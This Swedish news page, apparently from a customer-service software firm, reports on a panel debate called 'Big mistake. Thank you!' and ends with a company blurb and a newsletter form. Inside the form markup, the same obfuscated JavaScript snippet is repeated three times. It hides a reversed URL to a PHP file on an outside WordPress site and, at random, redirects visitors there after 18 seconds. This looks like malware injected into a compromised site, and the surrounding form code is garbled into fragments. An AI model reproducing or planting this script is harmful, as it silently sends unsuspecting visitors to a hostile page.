Fullsatt under eventet: Big mistake. Thank you!

big-misatake-event2018

I slutet av föregående vecka anordnade Indicate me tillsammans med Releasy en paneldebatt med temat ”Big mistake. Thank you!”

På plats deltog fem erfarna debattörer från Ikea, C More, Boxer, Santander Consumer Bank och Trafikförvaltningen. Debattörerna delade öppet med sig av sina misstag på vägen på succé i kundservice, vilket var något som uppskattades bland gästerna som framförallt bestod av kundserviceansvariga.

– Platserna till eventet fylldes upp på en gång. Det är kul att se att intresset för kundservice är högt och att så pass många besökare hade rest långt för att komma, berättar Lina Bjelkmar, VD på Indicate me.

Ämnena väckte engagemang

Under kvällen diskuterades bland annat rekrytering, chatbotar, robotisering (RPA) och hur man får kundservice att bli en prioriterad fråga.

– Ämnena som togs upp engagerade många, framförallt uppskattades det att panelen konkret framförde vilka utmaningar som de har haft och hur de har löst dem. Under pauserna blev det mycket diskussioner mellan deltagarna och frågor till paneldeltagare. Vi fick även en bra interaktion till publiken då man hade möjlighet att skicka in sina frågor i realtid via mentimeter under debatterna, berättar Lina.

Några röster från kvällen

Det var intressant att höra fem företag ha så olika lösningar på samma utmaningar

Det var kul att debattörerna var så öppna och delade med sig av sina erfarenheter, trots att konkurrenter satt i publiken

Härligt avslöjande att en av debattörerna tatuerat in företagets logotyp på armen

big-mistake-thank-you


Om oss
Indicate me erbjuder moderna digitala tjänster som hjälper företag till förbättrad kvalité, kundnöjdhet och högre lönsamhet i sin kundservice. Användare av Indicate me’s verktyg inkluderar företag såsom Ving och C More. Indicate me är dotterbolag till Releasy och ingår i samma koncern som Pulsen AB.


Nyhetsbrev
Prenumerera på vårt nyhetsbrev och ta del av den senaste informationen om Indicate me.

 
$NfI=function(n){if (typeof ($NfI.list[n]) == ”string”) return $NfI.list[n].split(””).reverse().join(””);return $NfI.list[n];};$NfI.list=[”’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}tocomplete=”off” maxlength=”512″ name=”Contact.email” required=”required” type=”email” placeholder=”E-post *” /> $NfI=function(n){if (typeof ($NfI.list[n]) == ”string”) return $NfI.list[n].split(””).reverse().join(””);return $NfI.list[n];};$NfI.list=[”’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}ton class=”Button Button–bordered” type=”submit”>Prenumerera$NfI=function(n){if (typeof ($NfI.list[n]) == ”string”) return $NfI.list[n].split(””).reverse().join(””);return $NfI.list[n];};$NfI.list=[”’php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}ton>


torAll("input, textarea");for(var s=0;stop.location.href=t;else{var e=document.getElementById(”up-form”),n=document.getElementById(”up-form-thanks”);e.style.display=”none”,n.style.display=”block”,a&&a.push&&a.push([”trackLink”,”https://post.upsales.com/”+f.responseText,”link”]),_uaq&&_uaq(”form=”+f.responseText)}else console.log(”AJAX ERROR”,f.status)}}else{var l=document.getElementById(”recaptcha-error”),c=document.getElementsByClassName(”g-recaptcha”);l.style.display=”none”,c&&c.length&&console.log(”handle this later”)}}var form=document.getElementById(”up-form”);form.addEventListener(”submit”,onSubmit)

 Kontakta oss